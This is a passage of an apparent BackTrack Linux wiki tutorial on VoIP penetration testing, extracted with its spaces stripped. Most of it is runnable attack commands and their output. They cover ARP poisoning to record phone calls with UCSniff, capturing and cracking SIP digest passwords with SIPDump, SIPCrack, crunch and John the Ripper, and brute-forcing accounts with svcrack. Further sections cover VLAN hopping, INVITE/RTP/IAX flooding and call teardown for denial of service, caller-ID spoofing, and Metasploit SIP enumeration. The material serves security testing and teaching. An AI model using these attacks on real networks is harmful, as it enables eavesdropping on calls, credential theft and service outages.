UCSniffisaVoIP&IPVideoSecurityAssessmenttoolthatintegratesexistingopensourcesoftwareintoseveraluseful
allowingVoIPandIPVideoownersandsecurityprofessionalstorapidlytestforthethreatofunauthorizedVoIPandV
Eavesdropping.UCSniffsupportsArppoisoning,VLANHopping,VLANDiscoveryviaCDP,ithasasniffercapabilitie
moreIconsideritasanallinoneeavesdroppingtool.Letstakealookatsomeusageexamples:
UCSniffcanoperatein2modes

MonitormodeShouldbeusedonasharedmediawheretheIPphonesconnectedtoi.e:aHUB,wirelessacces
canbealsobeusedinaswitchedenvironmentbysettingupaSPANsessionsonaCiscoswitch.
ManinthemiddlemodeThismodehas2additionalmodeswhichare
LearningMode
TargetedMode
PreparingUCSniffsowecanrunitfromanylocationinbacktrack:

root@bt:/tmp#cd/pentest/voip/ucsniff/
root@bt:/pentest/voip/ucsniff#./configure
root@bt:/pentest/voip/ucsniff#make
root@bt:/pentest/voip/ucsniff#makeinstall

MonitorModeUsage

root@bt:/tmp/ucsniff#ucsniffieth0M
UCSniff2.1starting
RunninginMonitorMode
Filedirectoryusers.txtcan'tbeopenedforreadinginworkingdirectory
Filetargets.txtcan'tbeopenedforreadinginworkingdirectory
Listeningoneth0...(Ethernet)
eth0>00:0C:29:84:98:B2192.168.1.105255.255.255.0
StartingUnifiedsniffing...
Warning:Pleaseensurethatyouhit'q'whenyouarefinishedwiththisprogram.
Warning:'q'reARPsthevictims.FailuretodosobeforeprogramexitwillresultinaDoS.
SIPCallinprogress.(extension200,ip192.168.1.104)calling(extension201,ip192.168.1.118)
SIPCallinprogress.(extension200,ip192.168.1.105)calling(extension201,ip192.168.1.104)
SIPCallended.Conversationrecordedinfile'200Calling2015:2:73both.wav'
SIPCallended.Conversationrecordedinfile'200Calling2015:2:82both.wav'
Closingtextinterface...
Unifiedsniffingwasstopped.

WecanstopthesessionsbypressingontheQkey.

SeveralfileswerecreatedbyUCSniff:LogfilesContainsdetailedinformationaboutsiptransactionsPcapfilescaptur
whichcanbeviewedinwiresharkaudiowavfilesconversationaudiofiles
http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

21/40

7/12/2015

PentestingVOIPBackTrackLinux

root@bt:/tmp/ucsniff#lsl
total376
rwrr1rootroot40854Feb505:02200Calling2015:2:73both.wav
rwrr1rootroot115818Feb505:02200Calling2015:2:73.pcap
rwrr1rootroot46294Feb505:02200Calling2015:2:82both.wav
rwrr1rootroot103940Feb505:02200Calling2015:2:82.pcap
rwrr1rootroot278Feb505:02call_detail_log
rwrr1rootroot317Feb505:02call_log
rwrr1rootroot10063Feb505:02sip.log
rwrr1rootroot39073Feb505:02sipdump.pcap
rwrr1rootroot0Feb505:01skinny_log

MITMLearningModeUsage

Thismodeusesasignalingprotocol(SIP,Skinny)tomapextensionstoanIPAddresses.Youcancustomizethetargetsto
interceptspecificIPAddressesorNetworks.InthefollowingexampleweassumeweareontheVoIPVLANUCSniffwi
poisonallhostsonthesubnet.

root@bt:/tmp/ucsniff#ucsniffieth0////
UCSniff2.1starting
Listeningoneth0...(Ethernet)
eth0>00:0C:29:84:98:B2192.168.1.105255.255.255.0
Randomizing255hostsforscanning...
Scanningthewholenetmaskfor255hosts...
*|==================================================>|100.00%
ARPpoisoningvictims:
GROUP1:ANY(allthehostsinthelist)
GROUP2:ANY(allthehostsinthelist)
Mappednewtargetentry:(IP:192.168.1.118)>extension201andname:Mappednewtargetentry:(IP:192.168.1.104)>extension200andname:
SIPCallinprogress.(extension201,ip192.168.1.118)calling(extension200,ip192.168.1.104)
SIPCallended.Conversationrecordedinfile'201Calling2005:13:42both.wav'
Closingtextinterface...
ARPpoisonerdeactivated.
REARPingthevictims...
Unifiedsniffingwasstopped.

IfwetakealookatUCSnifflogfileswecanseethediscoveredtargetsusedintheattack.
root@bt:/tmp/ucsniff#cattargets.txt
192.168.1.118,201,,sip
192.168.1.104,200,,sip

MITMTargetMode

TargetModeenablesEavesdroppingatalayerhigherthanjustrandomaudiostreamsortheIPaddressofphonesforwhic
knowtheextension.Thismodehas2submodes:TargetedUserTargetedConversationWecanaddtargetsmanuallytoth
targets.txtfileinthefollowingformat:x.x.x.x,extension,,sip192.168.1.118,201,,sipOruselearningmodetoautodisco

root@bt:/tmp/ucsniff#ucsniffieth0T
UCSniff2.1starting
Filetargets.txtcan'tbeopenedforreadinginworkingdirectory
NotargetshavebeenpreviouslydiscoveredinTargetsfile,targets.txt
PleaserunUCSniffinlearningmode,ormanuallyedittargets.txt

Onceavalidtargets.txtfileisfoundyouwillbeaskedtochooseaneavesdroppingmode:
root@bt:/tmp/ucsniff#ucsniffieth0T
UCSniff2.1starting
Parsed2entriesinTargetsfile,targets.txt
UCSniffrunningintargetmode.Parsed2previouslydiscoveredtargets
PleaseselectaTargetedEavesdroppingMode:
1.User
Description:Eavesdroponallcallstoorfromaparticularendpoint.
2.Conversation
Description:Eavesdroponbidirectionalconversationflowsbetweentwoselectedendpoints.
Pleaseselectoption(1)or(2):

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

22/40

7/12/2015

PentestingVOIPBackTrackLinux

Selecting"User"tellsthetooltointerceptalltrafficbetweentheoneTarget,andtherestofthenetwork.

In"Conversation",twoendpointsareselectedandthenetworkisARPPoisonedtoonlyinterceptthetrafficbetweenthos

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

23/40

7/12/2015

PentestingVOIPBackTrackLinux

UCSniffincludesmoreusefultoolsandattacksmodeslikeVLANhopping(usingACE)whichwillbediscussedlater.

Xplico

AlthoughXplicoisnotintheBacktrackvoiptoolsdirectory,itisaveryusefultoolforcapturingSIPandRTPtraffic(am
protocols).XplicocanbefoundintheBacktrack>DigitalForensics>ForensicAnalysismenu

IncaseitisnotpresentonyourBacktrackinstallationyoucansimplyinstallitbyissuingthefollowingcommand:

root@bt:~#aptgetinstallxplico

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

24/40

7/12/2015

PentestingVOIPBackTrackLinux

XplicocanbeusedtocapturelivetrafficorimportaWiresharkPCAPcapturefile.EitherwayXplicowilldecodethecap
packetsandwillassemblethemintotheappropriateformatInourcaseitwillbeSIPandRTP.AfterexecutingXplicoyo
askedtologin,thedefaultusernameandpasswordare:xplico

OncewehavesuccessfullyloggedintoXplicowewillneedtocreateacase

WewillbeaskedtochoosebetweenalivecaptureortoimportaPCAPfileInthisexamplewewilluseXplicotoperform
capture(wewillArppoisonourtargetsinthebackgroundusingarpspoof).Nowwewillhavetochooseourcaseandcrea
session

Bychoosingournewlycreatedsessionwewillseeourmainstatisticspagewiththeoptiontochooseournetworkadapter
start/stopthecaptureprocess.

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

25/40

7/12/2015

PentestingVOIPBackTrackLinux

HereisanexampleforcapturedSIPtraffic:

AnexampleforRTPdecodedtraffic:

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

26/40

7/12/2015

PentestingVOIPBackTrackLinux

CapturingSIPAuthenticationusingSIPDump

SIPDumpisapartoftheSIPCracktoolssuite,itallowsperformingalivecaptureofSIPauthenticationdigestresponseor
dumpapreviouslycapturedsessionsfromaPCAPfile.SIPDumpUsage:

root@bt:/pentest/voip/sipcrack#./sipdumpieth0
SIPdump0.3(MaJoMu|www.codito.de)

Usage:sipdump[OPTIONS]
=filewherecapturedloginswillbewrittento
Options:
i=interfacetolistenon
p=usepcapdatafile
m=enterlogindatamanually
f""=setlibpcapfilter
*Youneedtospecifydumpfile

LivecaptureusingSIPDump:
root@bt:/pentest/voip/sipcrack#./sipdumpieth0auth.txt
SIPdump0.3(MaJoMu|www.codito.de)

*Usingdev'eth0'forsniffing
*Startingtosniffwithpacketfilter'tcporudporvlan'
*Dumpedloginfrom192.168.1.104>192.168.1.111(User:'200')
*Dumpedloginfrom192.168.1.104>192.168.1.111(User:'200')
*Dumpedloginfrom192.168.1.104>192.168.1.111(User:'200')

DumpingauthenticationdatafromaPCAPfile
root@bt:/pentest/voip/sipcrack#./sipdumpp/root/registration.pcapauth.txt
SIPdump0.3(MaJoMu|www.codito.de)

*Usingpcapfile'/root/registration.pcap'forsniffing
*Startingtosniffwithpacketfilter'tcporudporvlan'
*Dumpedloginfrom192.168.1.104>192.168.1.101(User:'200')
*Exiting,sniffed1logins

SIPDumpwillwritetheauthenticationchallengeresponsetothespecifiedfilewhichlooksasfollows:
192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"44b80d16""""MD5"8edc2d549294f6535070439fb069c968
192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"46cce857""""MD5"4dfc7515936a667565228dbaa0293dfc
192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"2252e8fe""""MD5"5b895c6ae07ed8391212119aab36f108

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

27/40

7/12/2015

PentestingVOIPBackTrackLinux

Wewilldisscusscrackingthesechallengesintheattackingauthenticationchapter.

AttackingAuthentication

SIPcanbesusceptibleto2typesofauthenticationattacks,beforewetakealookattheseattackstypesletsunderstandho
registrationandauthenticationprocesstakesplace.SIPusesadigestauthenticationwhichisamechanismthattheHTTP
usesandknownasHTTPdigest.BecauseSIPisanASCIIbasedprotocoltheauthenticationdetailsarehashedinorderto
themtotransportincleartext.WhenaSIPclient(UserAgent)wantstoauthenticatewithaSIPserver,theservergenerate
sendsadigestchallengetotheclient,itcontainsthefollowingparameters:

RealmusedtoidentifycredentialswithinasSIPmessage,usuallyitisthesipdomain.Noncethisisanmd5uniquestr
isgeneratedbytheserverforeachregistrationrequestitismadefromatimestampandasecretphrasetoensureithasal
lifetimeandcouldbenotbeusedagain.Oncetheclientreceivesthedigestchallengeandtheuserentershiscredentialsth
usesthenoncetogenerateadigestresponseandsendsitbacktotheserver.

Withthatsaid,letstrytocrackthedigestresponseinordertoobtainavalidSIPaccountpassword.

CrackingSIPDigestresponsehashes

BacktrackprovidesagreattoolcalledSIPCrack,WealreadydiscussedhowtocaptureavalidSIPauthenticationdigestre
usingSIPDump.SIPCrackcanbefoundin

root@bt:/pentest/voip/sipcrack#

SIPCrackUsage:
http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

28/40

7/12/2015

PentestingVOIPBackTrackLinux

root@bt:/pentest/voip/sipcrack#./sipcrack
SIPcrack0.3(MaJoMu|www.codito.de)

Usage:sipcrack[OPTIONS][s|w]
=filecontainingloginssniffedbySIPdump
Options:
s=usestdinforpasswords
wwordlist=filecontainingallpasswordstotry
pnum=printcrackingprocesseverynpasswords(forw)
(ATTENTION:slowsdownheavily)
*Eitherworshastobegiven

SIPCrackcanoperateintwomodes:
Dictionaryattack
STDIN

Dictionaryattack
Backtrackprovidessomebasicdictionarieswhicharelocatedin:

root@bt:/pentest/passwords/wordlists

ButforthepurposeofthisarticleIwilluseanothergratetoolinbacktrackcalledCrunchwhichisusedtocreatecustomd
LetsusecrunchtocreateasixcharactersnumericdictionaryCrunchislocatedin:
root@bt:/pentest/passwords/crunch#

CrunchUsage:
usage:crunch[f/path/to/charset.lstcharsetname][owordlist.txt][t[FIXED]@@@@][sstartblock][cnumber]

Fordetailedcrunchusagecheckitsmanual:
root@bt:/pentest/passwords/crunch#mancrunch

Creatingasixcharsnumericdictionary:

root@bt:/pentest/passwords/crunch#./crunch66fcharset.lstnumerico/pentest/voip/sipcrack/sipass.txt
Crunchwillnowgenerate7000000bytesofdata
Crunchwillnowgenerate6MBofdata
Crunchwillnowgenerate0GBofdata
100%

WewilluseapreviouslycapturedsipcredentialsstoredbySIPDumpintheauth.txtfileanssipass.txtasthedictionary(w
createdusingcrunch)
http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

29/40

7/12/2015

PentestingVOIPBackTrackLinux

CrackingtheDigestResponse:

root@bt:/pentest/voip/sipcrack#./sipcrackwsipass.txtauth.txt
SIPcrack0.3(MaJoMu|www.codito.de)

*FoundAccounts:
NumServerClientUserHash|Password
1192.168.1.101192.168.1.1042003a33e768ed6f630347f4b511371926bd
*Selectwhichentrytocrack(11):1
*GeneratingstaticMD5hash...0a84f78fde66bb15197eab961462dc2f
*Startingbruteforceagainstuser'200'(MD5:'3a33e768ed6f630347f4b511371926bd')
*Loadedwordlist:'sipass.txt'
*Startingbruteforceagainstuser'200'(MD5:'3a33e768ed6f630347f4b511371926bd')
*Tried123457passwordsin0seconds
*Foundpassword:'123456'
*Updatingdumpfile'auth.txt'...done

BruteForceattackusingJohnTheRipper

ForthisattackmodewewillbeusingJohntherippertoredirectjohnsoutputintotheFIFOfilewhichwellfeedintoSIP
CreatingaFIFOfile:

root@bt:/tmp#mkfifosipcrack

GeneratingpasswordsusingjohnandredirectingtheoutputtoourFIFOfile,forthisexamplewewillgenerateupto6dig
root@bt:~#john
[*]Thisscriptwilltakeyouto/pentest/passwords/jtr/
[*]Fromthere,run./john
root@bt:/pentest/passwords/jtr#./johnincremental=digitsstdout=6>/tmp/sipcrack

UsingourFIFOfiletocrackthepassword:
root@bt:/pentest/voip/sipcrack#./sipcrackw/tmp/sipcrackauth.txt
SIPcrack0.3(MaJoMu|www.codito.de)

*FoundAccounts:
NumServerClientUserHash|Password
1192.168.1.111192.168.1.1042008edc2d549294f6535070439fb069c968
*Selectwhichentrytocrack(11):1
*GeneratingstaticMD5hash...0a84f78fde66bb15197eab961462dc2f
*Startingbruteforceagainstuser'200'(MD5:'8edc2d549294f6535070439fb069c968')
*Loadedwordlist:'/tmp/sipcrack'
*Startingbruteforceagainstuser'200'(MD5:'8edc2d549294f6535070439fb069c968')
*Tried3passwordsin0seconds
*Foundpassword:'123456'
*Updatingdumpfile'auth.txt'...done

BruteforcingSIPAccounts

WecanusesvcrackwhichisapartofthesipvicioustoolssuitetobruteforcesipaccountsAsingleSIPaccountdictionar
(Youcanaddavorvvforverbosity):

root@bt:/pentest/voip/sipvicious#./svcrack.pyu200dwordlist.txt192.168.1.104
|Extension|Password|

|200|123456|

AsingleSIPaccountbruteforcing:
http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

30/40

7/12/2015

PentestingVOIPBackTrackLinux

root@bt:/pentest/voip/sipvicious#./svcrack.pyu200r100000999999192.168.1.104
|Extension|Password|

|200|123456|

Use./svcrackhforallavailablearguments.

VLANHopping

UsuallyVoIPtrafficisconnectedtoadedicatedVLAN(VirtualLAN)aswesawinthetopologiessection.Thismeansth
cannotintercepttheVoIPtrafficbysniffingandArppoisoning.ThereasonforthatisthataVLANislikeaseparatenetw
itsownbroadcastdomainanddifferentIPrangethanthedatanetwork.VLANhoppingisawaytohoptoanotherVLA
forusBacktrackincludesthenecessarytoolstoperformthisattack.OnecommontopologyiswheretheIPPhonehasab
InternalSwitch,usuallythepcispluggedintothephonepcsocketandthephoneisconnectedfromitslan/swsocketto
networkswitchasfollows:

AtypicalCISCOswitchportconfigurationforVoIPwilllooksomethinglike:

Switch#conft
Enterconfigurationcommands,oneperline.EndwithCNTL/Z.

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

31/40

7/12/2015

PentestingVOIPBackTrackLinux

Switch(config)#interfacefastEthernet0/1
Switch(configif)#switchportmodeaccess
Switch(configif)#switchportaccessvlan10
Switch(configif)#switchportvoicevlan20

TheIPphonewillbeconfiguredwiththeappropriateVLANID(20)andthePCdatatrafficwillflowthroughVLAN10.
beginhoppingaroundwewillhavetoenablesupportforthe802.1qprotocolinBacktrackbytyping:
root@bt:~#modprobe8021q

VoIPHopper

VoIPhopperisusedtohopintovoiceVlanbybehavinglikeanIPphoneitsupportsspecificswitchesandsupportssome
models.Itcurrentlysupportsthebrandslike:Cisco,AvayaandNortel.VoIPhopperwasdesignedtorununderBacktrack
currentlyhasthefollowingfeatures:DHCPClient,CDPGenerator,MACAddressSpoofingandVLANhopping.Voipho
usage:

root@bt:/pentest/voip/voiphopper#./voiphopper
voiphopperi<interface>c{0|1|2}anv<VLANID>
Pleasespecify1baseoptionmode:
CDPSniffMode(c0)
Example:voiphopperieth0c0
CDPSpoofModewithcustompacket(c1):
D(DeviceID)
P(PortID)
C(Capabilities)
L(Platform)
S(Software)
U(Duplex)
Example:voiphopperieth0c1E'SIP00070EEA5086'P'Port1'CHostL'CiscoIPPhone7940'S'P00308800'U1
CDPSpoofModewithpremadepacket(c2)
Example:voiphopperieth0c2
AvayaDHCPOptionMode(a):
Example:voiphopperieth0a
VLANHopMode(vVLANID):
Example:voiphopperieth0v200
NortelDHCPOptionMode(n):
Example:voiphopperieth0n

VoIPHopperprovidesmanymodesforattackpleaseusethehfordetailedinformation.

LetstakealookatanexampleofsniffingforCDPandrunaVLANHopintotheVoiceVLANinaCiscoenvironment.
HopperontheEthernetinterface,inthefollowingway:

root@bt:/pentest/voip/voiphopper#./voiphopperieth0c0

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

32/40

7/12/2015

PentestingVOIPBackTrackLinux

VoIPHopperalsoallowsonetoVLANHoptoanarbitraryVLAN,withoutsniffingforCDP.IfyoualreadyknowtheVo
IDorwouldliketoVLANHopintoanotherVLANjustspecifythevlanid.

root@bt:/pentest/voip/voiphopper#./voiphopperieth0v20
VoIPHopper1.00RunninginVLANHopmode~TryingtohopintoVLAN2
AddedVLAN20toInterfaceeth0
Attemptingdhcprequestfornewinterfaceeth0.20
eth0.20Linkencap:EthernetHWaddr00:0c:29:84:98:b2
inet6addr:fe80::20c:29ff:fe84:98b2/64Scope:Link
UPBROADCASTNOTRAILERSRUNNINGMULTICASTMTU:1500Metric:1
RXpackets:0errors:0dropped:0overruns:0frame:0
TXpackets:9errors:0dropped:0overruns:0carrier:0
collisions:0txqueuelen:0
RXbytes:0(0.0B)TXbytes:2274(2.2KB)

ACE

ACEisanothertoolforvlanhoppingverysimilartoVoiphopperinusageandincludeanoptiontodiscoveralsoTFTPse
(configurationservers).ACEUsage:

root@bt:/pentest/voip/ace#./ace
ACEv1.0:AutomatedCorporate(Data)Enumerator
Usage:ace[iinterface][mmacaddress][ttftpserveripaddress|ccdpmode|vvoicevlanid|rvlaninterface|dverbosemode]
i<interface>(Mandatory)Interfaceforsniffing/sendingpackets
m<macaddress>(Mandatory)MACaddressofthevictimIPphone
t<tftpserverip>(Optional)tftpserveripaddress
c<cdpmode0|1>(Optional)0CDPsniffmode,1CDPspoofmode
v<voicevlanid>(Optional)EnterthevoicevlanID
r<vlaninterface>(Optional)RemovestheVLANinterface
d(Optional)Verbose|debugmode

Youcanmanuallyaddavlanhoporuseitsdiscoveryfeature
ModetospecifytheVoiceVLANID
Example:aceieth0v96m00:1E:F7:28:9C:8E
ModetoautodiscovervoicevlanIDinthelisteningmodeforCDP
Example:aceieth0c0m00:1E:F7:28:9C:8E
ModetoautodiscovervoicevlanIDinthespoofingmodeforCDP
Example:aceieth0c1m00:1E:F7:28:9C:8E

TIP:ToviewyourMACaddressinbacktrackuse:
root@bt:~#macchangerseth0

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

33/40

7/12/2015

PentestingVOIPBackTrackLinux

ItdoesntmatterifyouusedvoiphopperoraceyoucannowinterceptVoIPtrafficwithtoolslikeucsniffbyspecifying
createdinterface.
Forexample:

root@bt:/pentest/voip/ucsniff#ucsniffieth0.20////

DenialOfService

AdenialofserviceattackonVoIPservicescanrenderituselessbycausinganintentionallydamagetothenetworkandV
systemsavailability.Thisattackcanoccurontwolevels,standardnetworkdosattacksandVoIPspecificdosattacks.Gen
willsendtonsofdatabyfloodingthenetworktoconsumeallitsresourcesoraspecificprotocolinordertooverwhelmit
ofrequests.LetstakeaquickoverviewofthetoolsavailableinBacktrack

Inviteflood

ThistoolcanbeusedtofloodatargetwithINVITErequestsitcanbeusedtotargetsipgateways/proxiesandsipphones.

root@bt:/pentest/voip/inviteflood#./inviteflood
invitefloodVersion2.0
June09,2006
Usage:
Mandatory
interface(e.g.eth0)
targetuser(e.g.""orjohn.doeor5000or"1+2105551212")
targetdomain(e.g.enterprise.comoranIPv4address)
IPv4addroffloodtarget(ddd.ddd.ddd.ddd)
floodstage(i.e.numberofpackets)
Optional
afloodtool"From:"alias(e.g.jane.doe)
iIPv4sourceIPaddress[defaultisIPaddressofinterface]
SsrcPort(065535)[defaultiswellknowndiscardport9]
DdestPort(065535)[defaultiswellknownSIPport5060]
llineStringlineusedbySNOM[defaultisblank]
ssleeptimebtwnINVITEmsgs(usec)
hhelpprintthisusage
vverboseoutputmode

Abasicusagesyntaxlookslikethis:
./invitefloodeth0target_extensiontarget_domaintarget_ipnumber_of_packets

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

34/40

7/12/2015

PentestingVOIPBackTrackLinux

Aslongthetoolkeepsfloodingthesipgatewayitwillpreventusersfrommakingphonecalls.Youcanfloodthesipprox
inexistentextensionthusmakingitgeneratinga404notfoundjusttokeepitbusy.

Rtpflood

RtpfloodisusedtofloodatargetIPphonewithaUDPpacketcontainsaRTPdataInordertolaunchasuccessfulattack
rtpfloodyouwillneedknowtheRTPlisteningportontheremotedeviceyouwanttoattack,forexamplexlitesofphone
portis8000.

root@bt:/pentest/voip/rtpflood#./rtpflood
usage:./rtpfloodsourcenamedestinationnamesrcportdestportnumpacketsseqnotimestampSSID

Iaxflood
IAXFloodisatoolforfloodingtheIAX2protocolwhichisusedbytheAsteriskPBX.

root@bt:/pentest/voip/iaxflood#./iaxflood
usage:./iaxfloodsourcenamedestinationnamenumpackets

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

35/40

7/12/2015

PentestingVOIPBackTrackLinux

Teardown
Teardownisusedtoterminateacallbysendingabyerequest

./teardowneth0extensionsip_proxy10.1.101.35CallIDFromTagToTag

FirstyouwillneedtocaptureavalidsipOKresponseanduseitsfromandtotagsandavalidcalleridvalue.
SIP/2.0200OK
Via:SIP/2.0/UDP192.168.1.105;branch=z9hG4bKkfnyfaol;received=192.168.1.105;rport=5060
From:"200";tag=hcykd
To:"200";tag=as644fe807
CallID:jwtgckolqnoylqf@backtrack
CSeq:134REGISTER
UserAgent:AsteriskPBX
Allow:INVITE,ACK,CANCEL,OPTIONS,BYE,REFER,SUBSCRIBE,NOTIFY
Supported:replaces
Expires:3600
Contact:;expires=3600
Date:Tue,01Feb201117:55:42GMT
ContentLength:0

Ifyouspecifythevoptionyoucanseethepayload:

SIPPAYLOADforpacket:
BYEsip:[email protected]:5060SIP/2.0
Via:SIP/2.0/UDP192.168.1.105:9;branch=91ca1ba598ee44d5917061c30981c565
From:<sip:192.168.1.104>;tag=hcykd
To:200<sip:[email protected]>;tag=as644fe807
CallID:jwtgckolqnoylqf@backtrack
CSeq:2000000000BYE
MaxForwards:16
UserAgent:Hacker
ContentLength:0
Contact:<sip:192.168.1.105:9>

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

36/40

7/12/2015

PentestingVOIPBackTrackLinux

SpoofingCallerID

ThereareseveralmethodsforspoofingCallerIDwhichwewontdiscussherebecauseitrequiresadifferentsetoftoolsa
equipmentwhichareirrelevanttothisarticlepurpose.SpoofingCallerIDinSIPisfairlyeasy,youjustneedtochangeth
requestINVITEfromheader.

INVITEsip:@127.0.0.1SIP/2.0
To:<sip:192.168.1.104>
Via:SIP/2.0/UDP192.168.1.104
From:"EvilHacker"
CallID:14810.0.1.45
CSeq:1INVITE
MaxForwards:20
Contact:<sip:127.0.0.1>

WewilltakealookatatoolwehavealreadydiscussedcalledInvitefloodwhichcanbeusedtosendspoofedinvitereque
root@bt:/pentest/voip/inviteflood#./invitefloodeth0201192.168.1.104192.168.1.1041a"Backtrack"

AttackingVoIPUsingMetasploit

TheMetasploitframeworkincludesseveralauxiliariesandmodulesdedicatedforVoIPexploitation.Youcanfindthemb
searchfunctionwithkeywordssuchassiporvoip.LetsLaunchmsfconsoleandperformasearchforavailablemo

root@bt:~#msfconsole
msf>searchsip

MetasploitVoIPModules
Heresacompletelistoftheavailablemodulesforyoureference:
Auxiliaries

scanner/sip/enumeratorSIPUsernameEnumerator(UDP)scanner/sip/enumerator_tcpSIPUsernameEnumerator
scanner/sip/optionsSIPEndpointScanner(UDP)scanner/sip/options_tcpSIPEndpointScanner(TCP)voip/sip_inv
SIPInviteSpoof
Exploits

windows/sip/aim_triton_cseqAIMTriton1.0.4CSeqBufferOverflowwindows/sip/sipxezphone_cseqSIPfoundry
sipXezPhone0.35aCSeqFieldOverflowwindows/sip/sipxphone_cseqSIPfoundrysipXphone2.6.0.27CSeqBufferO
unix/webapp/trixbox_langchoiceTrixboxlangChoicePHPLocalFileInclusion

ScanningSIPEnabledDevices

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

37/40

7/12/2015

PentestingVOIPBackTrackLinux

MetasploitprovidesasipscannerauxiliarywhichcomesintwoflavorsTCPandUDP,wecanuseittodiscoverSIPenab
usingtheOPTIONmethod:LetsseeanexampleoftheUDPversion:scanner/sip/optionsauxiliaryAuxiliaryOptionsa

msf>useauxiliary/scanner/sip/options
msfauxiliary(options)>showoptions
Moduleoptions(auxiliary/scanner/sip/options):
NameCurrentSettingRequiredDescription

BATCHSIZE256yesThenumberofhoststoprobeineachset
CHOSTnoThelocalclientaddress
CPORT5060noThelocalclientport
RHOSTSyesThetargetaddressrangeorCIDRidentifier
RPORT5060yesThetargetport
THREADS1yesThenumberofconcurrentthreads
TOnobodynoThedestinationusernametoprobeateachhost
msfauxiliary(options)>setRHOSTS192.168.1.130/24
RHOSTS=>192.168.1.130/24
msfauxiliary(options)>run
[*]192.168.1.20200agent='GrandstreamHT502V1.2A1.0.1.35'verbs='INVITE,ACK,OPTIONS,CANCEL,BYE,SUBSCRIBE,NOTIFY,INFO,REFER,UPDATE'
[*]192.168.1.21200agent='GrandstreamHT502V1.2A1.0.1.35'verbs='INVITE,ACK,OPTIONS,CANCEL,BYE,SUBSCRIBE,NOTIFY,INFO,REFER,UPDATE'
[*]192.168.1.22200agent='GrandstreamHT502V1.2A1.0.1.35'verbs='INVITE,ACK,OPTIONS,CANCEL,BYE,SUBSCRIBE,NOTIFY,INFO,REFER,UPDATE'
[*]192.168.1.92200agent='GrandstreamHT502V1.2A1.0.1.35'verbs='INVITE,ACK,OPTIONS,CANCEL,BYE,SUBSCRIBE,NOTIFY,INFO,REFER,UPDATE'
[*]192.168.1.140200agent='GrandstreamHT502V1.2A1.0.1.35'verbs='INVITE,ACK,OPTIONS,CANCEL,BYE,SUBSCRIBE,NOTIFY,INFO,REFER,UPDATE'
[*]192.168.1.130200server='AsteriskPBX1.6.2.13'verbs='INVITE,ACK,CANCEL,OPTIONS,BYE,REFER,SUBSCRIBE,NOTIFY,INFO'
[*]Scanned256of256hosts(100%complete)
[*]Auxiliarymoduleexecutioncompleted

EnumeratingSIPextensions/Usernames

Thescanner/sip/enumeratorauxiliarycanbeusedtodiscovervalidSIPaccounts,itsupportstwomethodsofdiscovery:
andREGISTER,italsocomesintwoflavorsTCPandUDP.Auxiliaryoptions:

msf>usescanner/sip/enumerator
msfauxiliary(enumerator)>showoptions
Moduleoptions(auxiliary/scanner/sip/enumerator):
NameCurrentSettingRequiredDescription

BATCHSIZE256yesThenumberofhoststoprobeineachset
CHOSTnoThelocalclientaddress
CPORT5060noThelocalclientport
MAXEXT9999yesEndingextension
METHODREGISTERyesEnumerationmethodtouseOPTIONS/REGISTER
MINEXT0yesStartingextension
PADLEN4yesCeropaddingmaximumlength
RHOSTSyesThetargetaddressrangeorCIDRidentifier
RPORT5060yesThetargetport
THREADS1yesThenumberofconcurrentthreads

ExampleUsage:
msfauxiliary(enumerator)>setRHOSTS192.168.1.104
RHOSTS=>192.168.1.104
msfauxiliary(enumerator)>setMINEXT100
MINEXT=>100
msfauxiliary(enumerator)>setMAXEXT500
MAXEXT=>500
msfauxiliary(enumerator)>setPADLEN3
PADLEN=>3
msfauxiliary(enumerator)>run
[*]Founduser:200<sip:[email protected]>[Auth]
[*]Founduser:201<sip:[email protected]>[Auth]
[*]Founduser:202<sip:[email protected]>[Auth]
[*]Founduser:203<sip:[email protected]>[Auth]
[*]Founduser:204<sip:[email protected]>[Auth]
[*]Founduser:300<sip:[email protected]>[Auth]
[*]Scanned1of1hosts(100%complete)
[*]Auxiliarymoduleexecutioncompleted

SpoofingCallerIDauxiliary

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

38/40

7/12/2015

PentestingVOIPBackTrackLinux

Thevoip/sip_invite_spoofauxiliarywillcreateafakeSIPinviterequestmakingthetargeteddeviceringanddisplayfake
information.AuxiliaryOptions:

msf>usevoip/sip_invite_spoof
msfauxiliary(sip_invite_spoof)>showoptions
Moduleoptions(auxiliary/voip/sip_invite_spoof):
NameCurrentSettingRequiredDescription

MSGTheMetasploithasyouyesThespoofedcalleridtosend
RHOSTSyesThetargetaddressrangeorCIDRidentifier
RPORT5060yesThetargetport
SRCADDR192.168.1.1yesThesipaddressthespoofedcalliscomingfrom
THREADS1yesThenumberofconcurrentthreads

ExampleUsage:
msfauxiliary(sip_invite_spoof)>setRHOSTS192.168.1.104
RHOSTS=>192.168.1.104
msfauxiliary(sip_invite_spoof)>run
[*]SendingFakeSIPInviteto:192.168.1.104
[*]Scanned1of1hosts(100%complete)
[*]Auxiliarymoduleexecutioncompleted

ExploitingVoIPsystems
MetasploitincludesseveralexploitsforsipclientsoftwareandevenfortheTrixboxPBXwebmanagementinterface.
